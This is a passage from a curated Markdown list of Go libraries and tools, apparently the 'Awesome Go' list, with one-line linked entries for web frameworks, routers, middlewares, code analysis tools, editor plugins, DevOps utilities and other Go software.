- [Goyave](https://github.com/go-goyave/goyave) - Feature-complete REST API framework aimed at clean code and fast development, with powerful built-in functionalities.
- [Hertz](https://github.com/cloudwego/hertz) - A high-performance and strong-extensibility Go HTTP framework that helps developers build microservices.
- [hiboot](https://github.com/hidevopsio/hiboot) - hiboot is a high performance web application framework with auto configuration and dependency injection support.
- [Huma](https://github.com/danielgtaylor/huma/) - Framework for modern REST/GraphQL APIs with built-in OpenAPI 3, generated documentation, and a CLI.
- [Macaron](https://github.com/go-macaron/macaron) - Macaron is a high productive and modular design web framework in Go.
- [mango](https://github.com/paulbellamy/mango) - Mango is a modular web-application framework for Go, inspired by Rack, and PEP333.
- [Microservice](https://github.com/claygod/microservice) - The framework for the creation of microservices, written in Golang.
- [neo](https://github.com/ivpusic/neo) - Neo is minimal and fast Go Web Framework with extremely simple API.
- [patron](https://github.com/beatlabs/patron) - Patron is a microservice framework following best cloud practices with a focus on productivity.
- [Pnutmux](https://gitlab.com/fruitygo/pnutmux) - Pnutmux is a powerful Go web framework that uses regex for matching and handling HTTP requests. It offers features such as CORS handling, structured logging, URL parameters extraction, middlewares, and concurrency limiting.
- [Pulse](https://github.com/gopulse/pulse) - Pulse is an HTTP web framework written in Go (Golang)
- [Resoursea](https://github.com/resoursea/api) - REST framework for quickly writing resource based services.
- [REST Layer](https://github.com/rs/rest-layer) - Framework to build REST/GraphQL API on top of databases with mostly configuration over code.
- [Revel](https://github.com/revel/revel) - High-productivity web framework for the Go language.
- [rex](https://github.com/goanywhere/rex) - Rex is a library for modular development built upon gorilla/mux, fully compatible with `net/http`.
- [rk-boot](https://github.com/rookie-ninja/rk-boot) - A bootstrapper library for building enterprise go microservice with Gin and gRPC quickly and easily.
- [rux](https://github.com/gookit/rux) - Simple and fast web framework for build golang HTTP applications.
- [tango](https://github.com/lunny/tango) - Micro & pluggable web framework for Go.
- [tigertonic](https://github.com/rcrowley/go-tigertonic) - Go framework for building JSON web services inspired by Dropwizard.
- [uAdmin](https://github.com/uadmin/uadmin) - Fully featured web framework for Golang, inspired by Django.
- [utron](https://github.com/gernest/utron) - Lightweight MVC framework for Go(Golang).
- [vox](https://github.com/aisk/vox) - A golang web framework for humans, inspired by Koa heavily.
- [WebGo](https://github.com/bnkamalesh/webgo) - A micro-framework to build web apps; with handler chaining, middleware and context injection. With standard library compliant HTTP handlers(i.e. http.HandlerFunc).
- [YARF](https://github.com/yarf-framework/yarf) - Fast micro-framework designed to build REST APIs and web services in a fast and simple way.
**[⬆ back to top](#contents)**
### Middlewares
#### Actual middlewares
- [client-timing](https://github.com/posener/client-timing) - An HTTP client for Server-Timing header.
- [CORS](https://github.com/rs/cors) - Easily add CORS capabilities to your API.
- [echo-middleware](https://github.com/faabiosr/echo-middleware) - Middleware for Echo framework with logging and metrics.
- [formjson](https://github.com/rs/formjson) - Transparently handle JSON input as a standard form POST.
- [go-fault](https://github.com/github/go-fault) - Fault injection middleware for Go.
- [go-server-timing](https://github.com/mitchellh/go-server-timing) - Add/parse Server-Timing header.
- [Limiter](https://github.com/ulule/limiter) - Dead simple rate limit middleware for Go.
- [ln-paywall](https://github.com/philippgille/ln-paywall) - Go middleware for monetizing APIs on a per-request basis with the Lightning Network (Bitcoin).
- [mid](https://github.com/bobg/mid) - Miscellaneous HTTP middleware features: idiomatic error return from handlers; receive/respond with JSON data; request tracing; and more.
- [rk-gin](https://github.com/rookie-ninja/rk-gin) - Middleware for Gin framework with logging, metrics, auth, tracing etc.
- [rk-grpc](https://github.com/rookie-ninja/rk-grpc) - Middleware for gRPC with logging, metrics, auth, tracing etc.
- [Tollbooth](https://github.com/didip/tollbooth) - Rate limit HTTP request handler.
- [XFF](https://github.com/sebest/xff) - Handle `X-Forwarded-For` header and friends.
#### Libraries for creating HTTP middlewares
- [alice](https://github.com/justinas/alice) - Painless middleware chaining for Go.
- [catena](https://github.com/codemodus/catena) - http.Handler wrapper catenation (same API as "chain").
- [chain](https://github.com/codemodus/chain) - Handler wrapper chaining with scoped data (net/context-based "middleware").
- [gores](https://github.com/alioygur/gores) - Go package that handles HTML, JSON, XML and etc. responses. Useful for RESTful APIs.
- [interpose](https://github.com/carbocation/interpose) - Minimalist net/http middleware for golang.
- [mediary](https://github.com/HereMobilityDevelopers/mediary) - add interceptors to `http.Client` to allow dumping/shaping/tracing/... of requests/responses.
- [muxchain](https://github.com/stephens2424/muxchain) - Lightweight middleware for net/http.
- [negroni](https://github.com/urfave/negroni) - Idiomatic HTTP middleware for Golang.
- [render](https://github.com/unrolled/render) - Go package for easily rendering JSON, XML, and HTML template responses.
- [renderer](https://github.com/thedevsaddam/renderer) - Simple, lightweight and faster response (JSON, JSONP, XML, YAML, HTML, File) rendering package for Go.
- [rye](https://github.com/InVisionApp/rye) - Tiny Go middleware library (with canned Middlewares) that supports JWT, CORS, Statsd, and Go 1.7 context.
- [stats](https://github.com/thoas/stats) - Go middleware that stores various information about your web application.
**[⬆ back to top](#contents)**
### Routers
- [alien](https://github.com/gernest/alien) - Lightweight and fast http router from outer space.
- [bellt](https://github.com/GuilhermeCaruso/bellt) - A simple Go HTTP router.
- [Bone](https://github.com/go-zoo/bone) - Lightning Fast HTTP Multiplexer.
- [Bxog](https://github.com/claygod/Bxog) - Simple and fast HTTP router for Go. It works with routes of varying difficulty, length and nesting. And he knows how to create a URL from the received parameters.
- [chi](https://github.com/go-chi/chi) - Small, fast and expressive HTTP router built on net/context.
- [fasthttprouter](https://github.com/buaazp/fasthttprouter) - High performance router forked from `httprouter`. The first router fit for `fasthttp`.
- [FastRouter](https://github.com/razonyang/fastrouter) - a fast, flexible HTTP router written in Go.
- [goblin](https://github.com/bmf-san/goblin) - A golang http router based on trie tree.
- [gocraft/web](https://github.com/gocraft/web) - Mux and middleware package in Go.
- [Goji](https://github.com/goji/goji) - Goji is a minimalistic and flexible HTTP request multiplexer with support for `net/context`.
- [GoLobby/Router](https://github.com/golobby/router) - GoLobby Router is a lightweight yet powerful HTTP router for the Go programming language.
- [goroute](https://github.com/goroute/route) - Simple yet powerful HTTP request multiplexer.
- [GoRouter](https://github.com/vardius/gorouter) - GoRouter is a Server/API micro framework, HTTP request router, multiplexer, mux that provides request router with middleware supporting `net/context`.
- [gowww/router](https://github.com/gowww/router) - Lightning fast HTTP router fully compatible with the net/http.Handler interface.
- [httprouter](https://github.com/julienschmidt/httprouter) - High performance router. Use this and the standard http handlers to form a very high performance web framework.
- [httptreemux](https://github.com/dimfeld/httptreemux) - High-speed, flexible tree-based HTTP router for Go. Inspiration from httprouter.
- [lars](https://github.com/go-playground/lars) - Is a lightweight, fast and extensible zero allocation HTTP router for Go used to create customizable frameworks.
- [mux](https://github.com/gorilla/mux) - Powerful URL router and dispatcher for golang.
- [nchi](https://github.com/muir/nchi) - chi-like router built on httprouter with dependency injection based middleware wrappers
- [ngamux](https://github.com/ngamux/ngamux) - Simple HTTP router for Go.
- [ozzo-routing](https://github.com/go-ozzo/ozzo-routing) - An extremely fast Go (golang) HTTP router that supports regular expression route matching. Comes with full support for building RESTful APIs.
- [pure](https://github.com/go-playground/pure) - Is a lightweight HTTP router that sticks to the std "net/http" implementation.
- [Siesta](https://github.com/VividCortex/siesta) - Composable framework to write middleware and handlers.
- [vestigo](https://github.com/husobee/vestigo) - Performant, stand-alone, HTTP compliant URL Router for go web applications.
- [violetear](https://github.com/nbari/violetear) - Go HTTP router.
- [xmux](https://github.com/rs/xmux) - High performance muxer based on `httprouter` with `net/context` support.
- [xujiajun/gorouter](https://github.com/xujiajun/gorouter) - A simple and fast HTTP router for Go.
**[⬆ back to top](#contents)**
## WebAssembly
- [dom](https://github.com/dennwc/dom) - DOM library.
- [go-canvas](https://github.com/markfarnan/go-canvas) - Library to use HTML5 Canvas, with all drawing within go code.
- [tinygo](https://github.com/tinygo-org/tinygo) - Go compiler for small places. Microcontrollers, WebAssembly, and command-line tools. Based on LLVM.
- [vert](https://github.com/norunners/vert) - Interop between Go and JS values.
- [wasmbrowsertest](https://github.com/agnivade/wasmbrowsertest) - Run Go WASM tests in your browser.
- [webapi](https://github.com/gowebapi/webapi) - Bindings for DOM and HTML generated from WebIDL.
**[⬆ back to top](#contents)**
## Windows
- [d3d9](https://github.com/gonutz/d3d9) - Go bindings for Direct3D9.
- [go-ole](https://github.com/go-ole/go-ole) - Win32 OLE implementation for golang.
- [gosddl](https://github.com/MonaxGT/gosddl) - Converter from SDDL-string to user-friendly JSON. SDDL consist of four part: Owner, Primary Group, DACL, SACL.
**[⬆ back to top](#contents)**
## XML
_Libraries and tools for manipulating XML._
- [XML-Comp](https://github.com/xml-comp/xml-comp) - Simple command line XML comparer that generates diffs of folders, files and tags.
- [xml2map](https://github.com/sbabiv/xml2map) - XML to MAP converter written Golang.
- [xmlwriter](https://github.com/shabbyrobe/xmlwriter) - Procedural XML generation API based on libxml2's xmlwriter module.
- [xpath](https://github.com/antchfx/xpath) - XPath package for Go.
- [xquery](https://github.com/antchfx/xquery) - XQuery lets you extract data from HTML/XML documents using XPath expression.
- [zek](https://github.com/miku/zek) - Generate a Go struct from XML.
## Zero Trust
_Libraries and tools to implement Zero Trust architectures._
- [Cosign](https://github.com/sigstore/cosign) - Container Signing, Verification and Storage in an OCI registry.
- [in-toto](https://github.com/in-toto/in-toto-golang) - Go implementation of the in-toto (provides a framework to protect the integrity of the software supply chain) python reference implementation.
- [Spiffe-Vault](https://github.com/philips-labs/spiffe-vault) - Utilizes Spiffe JWT authentication with Hashicorp Vault for secretless authentication.
- [Spire](https://github.com/spiffe/spire) - SPIRE (the SPIFFE Runtime Environment) is a toolchain of APIs for establishing trust between software systems across a wide variety of hosting platforms.
## Code Analysis
_Source code analysis tools, also known as Static Application Security Testing (SAST) Tools._
- [apicompat](https://github.com/bradleyfalzon/apicompat) - Checks recent changes to a Go project for backwards incompatible changes.
- [asty](https://github.com/asty-org/asty) - Converts golang AST to JSON and JSON to AST.
- [blanket](https://gitlab.com/verygoodsoftwarenotvirus/blanket) - blanket is a tool that helps you catch functions which don't have direct unit tests in your Go packages.
- [ChainJacking](https://github.com/Checkmarx/chainjacking) - Find which of your Go lang direct GitHub dependencies is susceptible to ChainJacking attack.
- [Chronos](https://github.com/amit-davidson/Chronos) - Detects race conditions statically
- [dupl](https://github.com/mibk/dupl) - Tool for code clone detection.
- [errcheck](https://github.com/kisielk/errcheck) - Errcheck is a program for checking for unchecked errors in Go programs.
- [gcvis](https://github.com/davecheney/gcvis) - Visualise Go program GC trace data in real time.
- [go-checkstyle](https://github.com/qiniu/checkstyle) - checkstyle is a style check tool like java checkstyle. This tool inspired by java checkstyle, golint. The style referred to some points in Go Code Review Comments.
- [go-cleanarch](https://github.com/roblaszczak/go-cleanarch) - go-cleanarch was created to validate Clean Architecture rules, like a The Dependency Rule and interaction between packages in your Go projects.
- [go-critic](https://github.com/go-critic/go-critic) - source code linter that brings checks that are currently not implemented in other linters.
- [go-mod-outdated](https://github.com/psampaz/go-mod-outdated) - An easy way to find outdated dependencies of your Go projects.
- [go-outdated](https://github.com/firstrow/go-outdated) - Console application that displays outdated packages.
- [goast-viewer](https://github.com/yuroyoro/goast-viewer) - Web based Golang AST visualizer.
- [goimports](https://godoc.org/golang.org/x/tools/cmd/goimports) - Tool to fix (add, remove) your Go imports automatically.
- [golang-ifood-sdk](https://github.com/arxdsilva/golang-ifood-sdk) - iFood API SDK.
- [golines](https://github.com/segmentio/golines) - Formatter that automatically shortens long lines in Go code.
- [GoLint](https://github.com/golang/lint) - Golint is a linter for Go source code.
- [GoPlantUML](https://github.com/jfeliu007/goplantuml) - Library and CLI that generates text plantump class diagram containing information about structures and interfaces with the relationship among them.
- [goreturns](https://sourcegraph.com/github.com/sqs/goreturns) - Adds zero-value return statements to match the func return types.
- [gostatus](https://github.com/shurcooL/gostatus) - Command line tool, shows the status of repositories that contain Go packages.
- [lint](https://github.com/surullabs/lint) - Run linters as part of go test.
- [php-parser](https://github.com/z7zmey/php-parser) - A Parser for PHP written in Go.
- [staticcheck](https://github.com/dominikh/go-tools/tree/master/cmd/staticcheck) - staticcheck is `go vet` on steroids, applying a ton of static analysis checks you might be used to from tools like ReSharper for C#.
- [tickgit](https://github.com/augmentable-dev/tickgit) - CLI and go package for surfacing code comment TODOs (in any language) and applying a `git blame`to identify the author.
- [todocheck](https://github.com/preslavmihaylov/todocheck) - Static code analyser which links TODO comments in code with issues in your issue tracker.
- [unconvert](https://github.com/mdempsky/unconvert) - Remove unnecessary type conversions from Go source.
- [usestdlibvars](https://github.com/sashamelentyev/usestdlibvars) - A linter that detect the possibility to use variables/constants from the Go standard library.
- [vaccum](https://github.com/daveshanley/vacuum) - An ultra-super-fast, lightweight OpenAPI linter and quality checking tool.
- [validate](https://github.com/mccoyst/validate) - Automatically validates struct fields with tags.
**[⬆ back to top](#contents)**
## Editor Plugins
_Plugin for text editors and IDEs._
- [coc-go language server extension for Vim/Neovim](https://github.com/josa42/coc-go) - This plugin adds [gopls](https://github.com/golang/tools/blob/master/gopls/README.md) features to Vim/Neovim.
- [Go Doc](https://github.com/msyrus/vscode-go-doc) - A Visual Studio Code extension for showing definition in output and generating go doc.
- [Go plugin for JetBrains IDEs](https://plugins.jetbrains.com/plugin/9568-go) - Go plugin for JetBrains IDEs.
- [go-language-server](https://github.com/theia-ide/go-language-server) - A wrapper to turn the VSCode go extension into a language server supporting the language-server-protocol.
- [go-mode](https://github.com/dominikh/go-mode.el) - Go mode for GNU/Emacs.
- [go-plus](https://github.com/joefitzgerald/go-plus) - Go (Golang) Package For Atom That Adds Autocomplete, Formatting, Syntax Checking, Linting and Vetting.
- [gocode](https://github.com/nsf/gocode) - Autocompletion daemon for the Go programming language.
- [goimports-reviser](https://github.com/incu6us/goimports-reviser) - Formatting tool for imports.
- [goprofiling](https://marketplace.visualstudio.com/items?itemName=MaxMedia.go-prof) - This extension adds benchmark profiling support for the Go language to VS Code.
- [GoSublime](https://github.com/DisposaBoy/GoSublime) - Golang plugin collection for the text editor SublimeText 3 providing code completion and other IDE-like features.
- [gounit-vim](https://github.com/hexdigest/gounit-vim) - Vim plugin for generating Go tests based on the function's or method's signature.
- [theia-go-extension](https://github.com/theia-ide/theia-go-extension) - Go language support for the Theia IDE.
- [vim-compiler-go](https://github.com/rjohnsondev/vim-compiler-go) - Vim plugin to highlight syntax errors on save.
- [vim-go](https://github.com/fatih/vim-go) - Go development plugin for Vim.
- [vscode-go](https://github.com/golang/vscode-go) - Extension for Visual Studio Code (VS Code) which provides support for the Go language.
- [Watch](https://github.com/eaburns/Watch) - Runs a command in an acme win on file changes.
**[⬆ back to top](#contents)**
## Go Generate Tools
- [generic](https://github.com/usk81/generic) - flexible data type for Go.
- [genny](https://github.com/cheekybits/genny) - Elegant generics for Go.
- [gocontracts](https://github.com/Parquery/gocontracts) - brings design-by-contract to Go by synchronizing the code with the documentation.
- [godal](https://github.com/mafulong/godal) - Generate orm models corresponding to golang by specifying sql ddl file, which can be used by gorm.
- [gonerics](https://github.com/bouk/gonerics) - Idiomatic Generics in Go.
- [gotests](https://github.com/cweill/gotests) - Generate Go tests from your source code.
- [gounit](https://github.com/hexdigest/gounit) - Generate Go tests using your own templates.
- [hasgo](https://github.com/DylanMeeus/hasgo) - Generate Haskell inspired functions for your slices.
- [options-gen](https://github.com/kazhuravlev/options-gen) - Functional options described by Dave Cheney's post "Functional options for friendly APIs".
- [re2dfa](https://github.com/opennota/re2dfa) - Transform regular expressions into finite state machines and output Go source code.
- [sqlgen](https://github.com/anqiansong/sqlgen) - Generate gorm, xorm, sqlx, bun, sql code from SQL file or DSN.
- [TOML-to-Go](https://xuri.me/toml-to-go) - Translates TOML into a Go type in the browser instantly.
- [xgen](https://github.com/xuri/xgen) - XSD (XML Schema Definition) parser and Go/C/Java/Rust/TypeScript code generator.
**[⬆ back to top](#contents)**
## Go Tools
- [colorgo](https://github.com/songgao/colorgo) - Wrapper around `go` command for colorized `go build` output.
- [depth](https://github.com/KyleBanks/depth) - Visualize dependency trees of any package by analyzing imports.
- [docs](https://github.com/go-oas/docs) - Automatically generate RESTful API documentation for GO projects - aligned with Open API Specification standard.
- [go-callvis](https://github.com/TrueFurby/go-callvis) - Visualize call graph of your Go program using dot format.
- [go-james](https://github.com/pieterclaerhout/go-james) - Go project skeleton creator, builds and tests your projects without the manual setup.
- [go-pkg-complete](https://github.com/skelterjohn/go-pkg-complete) - Bash completion for go and wgo.
- [go-swagger](https://github.com/go-swagger/go-swagger) - Swagger 2.0 implementation for go. Swagger is a simple yet powerful representation of your RESTful API.
- [godbg](https://github.com/tylerwince/godbg) - Implementation of Rusts `dbg!` macro for quick and easy debugging during development.
- [gomodrun](https://github.com/dustinblackman/gomodrun/) - Go tool that executes and caches binaries included in go.mod files.
- [gotemplate.io](https://gotemplate.io/) - Online tool to preview `text/template` templates live.
- [gotestdox](https://github.com/bitfield/gotestdox) - Show Go test results as readable sentences.
- [gothanks](https://github.com/psampaz/gothanks) - GoThanks automatically stars your go.mod github dependencies, sending this way some love to their maintainers.
- [igo](https://github.com/rocketlaunchr/igo) - An igo to go transpiler (new language features for Go language!)
- [modver](https://github.com/bobg/modver) - Compare two versions of a Go module to check the version-number change required (major, minor, or patchlevel), according to [semver](https://semver.org/) rules.
- [OctoLinker](https://github.com/OctoLinker/browser-extension) - Navigate through go files efficiently with the OctoLinker browser extension for GitHub.
- [richgo](https://github.com/kyoh86/richgo) - Enrich `go test` outputs with text decorations.
- [roumon](https://github.com/becheran/roumon) - Monitor current state of all active goroutines via a command line interface.
- [rts](https://github.com/galeone/rts) - RTS: response to struct. Generates Go structs from server responses.
- [textra](https://github.com/ravsii/textra) - Extract Go struct field names, types and tags for filtering and exporting.
- [typex](https://github.com/dtgorski/typex) - Examine Go types and their transitive dependencies, alternatively export results as TypeScript value objects (or types) declaration.
**[⬆ back to top](#contents)**
## Software Packages
_Software written in Go._
**[⬆ back to top](#contents)**
### DevOps Tools
- [abbreviate](https://github.com/dnnrly/abbreviate) - abbreviate is a tool turning long strings in to shorter ones with configurable separators, for example to embed branch names in to deployment stack IDs.
- [aptly](https://github.com/smira/aptly) - aptly is a Debian repository management tool.
- [aurora](https://github.com/xuri/aurora) - Cross-platform web-based Beanstalkd queue server console.
- [awsenv](https://github.com/soniah/awsenv) - Small binary that loads Amazon (AWS) environment variables for a profile.
- [Balerter](https://github.com/balerter/balerter) - A self-hosted script-based alerting manager.
- [Blast](https://github.com/dave/blast) - A simple tool for API load testing and batch jobs.
- [bombardier](https://github.com/codesenberg/bombardier) - Fast cross-platform HTTP benchmarking tool.
- [bosun](https://github.com/bosun-monitor/bosun) - Time Series Alerting Framework.
- [cassowary](https://github.com/rogerwelin/cassowary) - Modern cross-platform HTTP load-testing tool written in Go.
- [Ddosify](https://github.com/ddosify/ddosify) - High-performance load testing tool, written in Golang.
- [DepCharge](https://github.com/centerorbit/depcharge) - Helps orchestrating the execution of commands across the many dependencies in larger projects.
- [docker-go-mingw](https://github.com/x1unix/docker-go-mingw) - Docker image for building Go binaries for Windows with MinGW toolchain.
- [Dockerfile-Generator](https://github.com/ozankasikci/dockerfile-generator) - A go library and an executable that produces valid Dockerfiles using various input channels.
- [dogo](https://github.com/liudng/dogo) - Monitoring changes in the source file and automatically compile and run (restart).
- [drone-jenkins](https://github.com/appleboy/drone-jenkins) - Trigger downstream Jenkins jobs using a binary, docker or Drone CI.
- [drone-scp](https://github.com/appleboy/drone-scp) - Copy files and artifacts via SSH using a binary, docker or Drone CI.
- [Dropship](https://github.com/chrismckenzie/dropship) - Tool for deploying code via cdn.
- [easyssh-proxy](https://github.com/appleboy/easyssh-proxy) - Golang package for easy remote execution through SSH and SCP downloading via `ProxyCommand`.
- [fac](https://github.com/mkchoi212/fac) - Command-line user interface to fix git merge conflicts.
- [Fleet device management](https://github.com/fleetdm/fleet) - Lightweight, programmable telemetry for servers and workstations.
- [gaia](https://github.com/gaia-pipeline/gaia) - Build powerful pipelines in any programming language.
- [ghorg](https://github.com/gabrie30/ghorg) - Quickly clone an entire org/users repositories into one directory - Supports GitHub, GitLab, Gitea, and Bitbucket.
- [Gitea](https://github.com/go-gitea/gitea) - Fork of Gogs, entirely community driven.
- [gitea-github-migrator](https://git.jonasfranz.software/JonasFranzDEV/gitea-github-migrator) - Migrate all your GitHub repositories, issues, milestones and labels to your Gitea instance.
- [go-furnace](https://github.com/go-furnace/go-furnace) - Hosting solution written in Go. Deploy your Application with ease on AWS, GCP or DigitalOcean.
- [go-rocket-update](https://github.com/mouuff/go-rocket-update) - A simple way to make self updating Go applications - Supports Github and Gitlab.
- [go-selfupdate](https://github.com/sanbornm/go-selfupdate) - Enable your Go applications to self update.
- [gobrew](https://github.com/cryptojuice/gobrew) - gobrew lets you easily switch between multiple versions of go.
- [gobrew](https://github.com/kevincobain2000/gobrew) - Go version manager. Super simple tool to install and manage Go versions. Install go without root. Gobrew doesn't require shell rehash.
- [godbg](https://github.com/sirnewton01/godbg) - Web-based gdb front-end application.
- [Gogs](https://gogs.io/) - A Self Hosted Git Service in the Go Programming Language.
- [gonative](https://github.com/inconshreveable/gonative) - Tool which creates a build of Go that can cross compile to all platforms while still using the Cgo-enabled versions of the stdlib packages.
- [govvv](https://github.com/ahmetalpbalkan/govvv) - “go build” wrapper to easily add version information into Go binaries.
- [gox](https://github.com/mitchellh/gox) - Dead simple, no frills Go cross compile tool.
- [goxc](https://github.com/laher/goxc) - build tool for Go, with a focus on cross-compiling and packaging.
- [grapes](https://github.com/yaronsumel/grapes) - Lightweight tool designed to distribute commands over ssh with ease.
- [GVM](https://github.com/moovweb/gvm) - GVM provides an interface to manage Go versions.
- [Hey](https://github.com/rakyll/hey) - Hey is a tiny program that sends some load to a web application.
- [httpref](https://github.com/dnnrly/httpref) - httpref is a handy CLI reference for HTTP methods, status codes, headers, and TCP and UDP ports.
- [jcli](https://github.com/jenkins-zh/jenkins-cli) - Jenkins CLI allows you manage your Jenkins as an easy way.
- [kala](https://github.com/ajvb/kala) - Simplistic, modern, and performant job scheduler.
- [kcli](https://github.com/cswank/kcli) - Command line tool for inspecting kafka topics/partitions/messages.
- [ko](https://github.com/google/ko) - Command line tool for building and deploying Go applications on Kubernetes
- [kool](https://github.com/kool-dev/kool) - Command line tool for managing Docker environments as an easy way.
- [kubernetes](https://github.com/kubernetes/kubernetes) - Container Cluster Manager from Google.
- [KubeVela](https://github.com/kubevela/kubevela) - Cloud native application delivery.
- [kwatch](https://github.com/abahmed/kwatch) - Monitor & detect crashes in your Kubernetes(K8s) cluster instantly.
- [lstags](https://github.com/ivanilves/lstags) - Tool and API to sync Docker images across different registries.
- [lwc](https://github.com/timdp/lwc) - A live-updating version of the UNIX wc command.
- [manssh](https://github.com/xwjdsh/manssh) - manssh is a command line tool for managing your ssh alias config easily.
- [Mantil](https://github.com/mantil-io/mantil) - Go specific framework for building serverless applications on AWS that enables you to focus on pure Go code while Mantil takes care of the infrastructure.
- [Mizu](https://github.com/up9inc/mizu) - API traffic viewer for Kubernetes enabling you to view all API communication between microservices, multiprotocol support: HTTP1.1, HTTP/2, AMQP, Kafka, Redis.
- [Moby](https://github.com/moby/moby) - Collaborative project for the container ecosystem to assemble container-based systems.
- [Mora](https://github.com/emicklei/mora) - REST server for accessing MongoDB documents and meta data.
- [ostent](https://github.com/ostrost/ostent) - collects and displays system metrics and optionally relays to Graphite and/or InfluxDB.
- [Packer](https://github.com/mitchellh/packer) - Packer is a tool for creating identical machine images for multiple platforms from a single source configuration.
- [Pewpew](https://github.com/bengadbois/pewpew) - Flexible HTTP command line stress tester.
- [Pomerium](https://github.com/pomerium/pomerium) - Pomerium is an identity-aware access proxy.
- [Rodent](https://github.com/alouche/rodent) - Rodent helps you manage Go versions, projects and track dependencies.
- [s3-proxy](https://github.com/oxyno-zeta/s3-proxy) - S3 Proxy with GET, PUT and DELETE methods and authentication (OpenID Connect and Basic Auth).
- [s3gof3r](https://github.com/rlmcpherson/s3gof3r) - Small utility/library optimized for high speed transfer of large objects into and out of Amazon S3.
- [s5cmd](https://github.com/peak/s5cmd) - Blazing fast S3 and local filesystem execution tool.
- [Scaleway-cli](https://github.com/scaleway/scaleway-cli) - Manage BareMetal Servers from Command Line (as easily as with Docker).
- [script](https://github.com/bitfield/script) - Making it easy to write shell-like scripts in Go for DevOps and system administration tasks.
- [sg](https://github.com/ChristopherRabotin/sg) - Benchmarks a set of HTTP endpoints (like ab), with possibility to use the response code and data between each call for specific server stress based on its previous response.
- [skm](https://github.com/TimothyYe/skm) - SKM is a simple and powerful SSH Keys Manager, it helps you to manage your multiple SSH keys easily!
- [StatusOK](https://github.com/sanathp/statusok) - Monitor your Website and REST APIs.Get Notified through Slack, E-mail when your server is down or response time is more than expected.
- [terraform-provider-openapi](https://github.com/dikhan/terraform-provider-openapi) - Terraform provider plugin that dynamically configures itself at runtime based on an OpenAPI document (formerly known as swagger file) containing the definitions of the APIs exposed.
- [tf-profile](https://github.com/datarootsio/tf-profile) - Profiler for Terraform runs. Generate global stats, resource-level stats or visualizations.
- [traefik](https://github.com/containous/traefik) - Reverse proxy and load balancer with support for multiple backends.
- [trubka](https://github.com/xitonix/trubka) - A CLI tool to manage and troubleshoot Apache Kafka clusters with the ability of generically publishing/consuming protocol buffer and plain text events to/from Kafka.
- [uTask](https://github.com/ovh/utask) - Automation engine that models and executes business processes declared in yaml.
- [Vegeta](https://github.com/tsenart/vegeta) - HTTP load testing tool and library. It's over 9000!
- [wait-for](https://github.com/dnnrly/wait-for) - Wait for something to happen (from the command line) before continuing. Easy orchestration of Docker services and other things.
- [webhook](https://github.com/adnanh/webhook) - Tool which allows user to create HTTP endpoints (hooks) that execute commands on the server.
- [Wide](https://wide.b3log.org/login) - Web-based IDE for Teams using Golang.
- [winrm-cli](https://github.com/masterzen/winrm-cli) - Cli tool to remotely execute commands on Windows machines.
**[⬆ back to top](#contents)**
### Other Software
- [Better Go Playground](https://goplay.tools) - Go playground with syntax highlight, code completion and other features.
- [blocky](https://github.com/0xERR0R/blocky) - Fast and lightweight DNS proxy as ad-blocker for local network with many features.
- [borg](https://github.com/crufter/borg) - Terminal based search engine for bash snippets.
- [boxed](https://github.com/tejo/boxed) - Dropbox based blog engine.
- [Cherry](https://github.com/rafael-santiago/cherry) - Tiny webchat server in Go.
- [Circuit](https://github.com/gocircuit/circuit) - Circuit is a programmable platform-as-a-service (PaaS) and/or Infrastructure-as-a-Service (IaaS), for management, discovery, synchronization and orchestration of services and hosts comprising cloud applications.
- [Comcast](https://github.com/tylertreat/Comcast) - Simulate bad network connections.
- [confd](https://github.com/kelseyhightower/confd) - Manage local application configuration files using templates and data from etcd or consul.
- [crawley](https://github.com/s0rg/crawley) - Web scraper/crawler for cli.
- [croc](https://github.com/schollz/croc) - Easily and securely send files or folders from one computer to another.
- [Docker](https://www.docker.com/) - Open platform for distributed applications for developers and sysadmins.
- [Documize](https://github.com/documize/community) - Modern wiki software that integrates data from SaaS tools.
- [dp](https://github.com/scryinfo/dp) - Through SDK for data exchange with blockchain, developers can get easy access to DAPP development.
- [drive](https://github.com/odeke-em/drive) - Google Drive client for the commandline.
- [Duplicacy](https://github.com/gilbertchen/duplicacy) - A cross-platform network and cloud backup tool based on the idea of lock-free deduplication.
- [Gebug](https://github.com/moshebe/gebug) - A tool that makes debugging of Dockerized Go applications super easy by enabling Debugger and Hot-Reload features, seamlessly.
- [gfile](https://github.com/Antonito/gfile) - Securely transfer files between two computers, without any third party, over WebRTC.
- [Go Package Store](https://github.com/shurcooL/Go-Package-Store) - App that displays updates for the Go packages in your GOPATH.
- [go-peerflix](https://github.com/Sioro-Neoku/go-peerflix) - Video streaming torrent client.
- [goblin](https://goblin.reaper.im) - Golang binaries in a curl, built by goblins.
- [GoBoy](https://github.com/Humpheh/goboy) - Nintendo Game Boy Color emulator written in Go.
- [gocc](https://github.com/goccmack/gocc) - Gocc is a compiler kit for Go written in Go.
- [GoDocTooltip](https://github.com/diankong/GoDocTooltip) - Chrome extension for Go Doc sites, which shows function description as tooltip at function list.
- [Gokapi](https://github.com/Forceu/gokapi) - Lightweight server to share files, which expire after a set amount of downloads or days. Similar to Firefox Send, but without public upload.
- [GoLand](https://jetbrains.com/go) - Full featured cross-platform Go IDE.
- [GoNB](https://github.com/janpfeifer/gonb) - Interactive Go programming with Jupyter Notebooks (also works in VSCode, Binder and Google's Colab).
- [Gor](https://github.com/buger/gor) - Http traffic replication tool, for replaying traffic from production to stage/dev environments in real-time.
- [Guora](https://github.com/meloalright/guora) - A self-hosted Quora like web application written in Go.
- [hoofli](https://github.com/dnnrly/hoofli) - Generate PlantUML diagrams from Chrome or Firefox network inspections.
- [hotswap](https://github.com/edwingeng/hotswap) - A complete solution to reload your go code without restarting your server, interrupting or blocking any ongoing procedure.
- [hugo](https://gohugo.io/) - Fast and Modern Static Website Engine.
- [ide](https://github.com/thestrukture/ide) - Browser accessible IDE. Designed for Go with Go.
- [ipe](https://github.com/dimiro1/ipe) - Open source Pusher server implementation compatible with Pusher client libraries written in GO.
- [joincap](https://github.com/assafmo/joincap) - Command-line utility for merging multiple pcap files together.
- [Juju](https://jujucharms.com/) - Cloud-agnostic service deployment and orchestration - supports EC2, Azure, Openstack, MAAS and more.
- [Leaps](https://github.com/jeffail/leaps) - Pair programming service using Operational Transforms.
- [lgo](https://github.com/yunabe/lgo) - Interactive Go programming with Jupyter. It supports code completion, code inspection and 100% Go compatibility.
- [limetext](https://limetext.github.io) - Lime Text is a powerful and elegant text editor primarily developed in Go that aims to be a Free and open-source software successor to Sublime Text.
- [LiteIDE](https://github.com/visualfc/liteide) - LiteIDE is a simple, open source, cross-platform Go IDE.
